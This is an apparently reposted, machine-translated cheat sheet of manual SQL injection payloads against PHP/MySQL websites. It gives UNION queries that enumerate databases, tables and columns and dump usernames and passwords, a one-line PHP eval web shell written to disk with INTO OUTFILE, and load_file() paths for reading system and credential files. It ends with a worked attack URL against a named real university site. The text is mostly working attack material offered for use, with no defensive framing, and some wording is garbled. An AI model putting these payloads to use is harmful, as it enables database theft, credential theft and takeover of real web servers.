Php+mysql Manual Injection Statement Daquan recommendation

Source: Internet
Author: User
Tags mysql manual

Burst field length

Order by num/*

Match field

and 1=1 Union Select 1,2,3,4,5.......n/*

Storm field position

and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to storm database information

Version () database () User ()

No need to guess the available fields. Database Information (some sites do not apply):

and 1=2 UNION ALL Select Version ()/*

and 1=2 UNION ALL Select Database ()/*

and 1=2 union ALL Select User ()/*

Operating System Information:

and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:

and Ord (User (), 1, 1)) =114/* Return to normal description as root

Bauku (mysql>5.0)

MySQL 5 above has built-in library information_schema, which stores all MySQL database and table structure information

and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table

and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hex) limit 0 (start record, 0 is the first start record), 1 (show 1 Records)-

Guess Field

and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hex) Limit 0,1

Burst password

And 1=2 Union Select, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage ( One available field displays two data content):

Union Select 1,2,3concat (user name segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)

Conditions:

1, know the site physical path

2, have sufficient permission (can use Select .... from Mysql.user test)

3, MAGIC_QUOTES_GPC () =off

Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '

and 1=2 union ALL Select a sentence hex value into outfile ' path '

Load_file () Common paths:

1. Replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2, replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (32), Char
The above two are a full display of code in a php file. Sometimes you do not replace some characters, such as "<" is replaced by "space" to return a Web page. You can't see the code.
3, Load_file (char (47)) can list Freebsd,sunos system root directory
4./etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf view Linux Apache virtual Host configuration file
5. C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development site Resin file configuration information.
7. c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf View JSP virtual host for Linux system configuration
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
Ten 、.. /themes/darkblue_orange/layout.inc.php phpMyAdmin Blast Path
11. C:\windows\system32\inetsrv\MetaBase.xml View the virtual host configuration file for IIS
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin profile view
13,/usr/local/resin-pro-3.0.22/conf/resin.conf ibid.
14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view
15,/etc/sysconfig/iptables Look at the firewall policy
16, USR/LOCAL/APP/PHP5 B/php.ini PHP's equivalent settings
17./etc/my.cnf MySQL configuration file
18,/etc/redhat-release Red Hat system version
19, C:\mysql\data\mysql\user. MYD A user password exists in the MySQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21,/USR/LOCAL/APP/PHP5 B/php.ini//php Related Settings
22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//virtual Site Settings
23.C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini

website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (32))

Note:

Char denotes <

Char (+) denotes a space

Problems with manual injections:

When the post-injection page appears:

Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '

such as:Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_ File (0x433a5c626f6f742e696e69), 3,4,user ()%20

This is caused by inconsistencies in the coding,

Workaround: Add unhex (Hex (parameter)) to the parameter before you can do it. The above URL can be changed to:

Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ()))%20

You can continue to inject ...

Php+mysql Manual Injection statement Daquan recommended

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.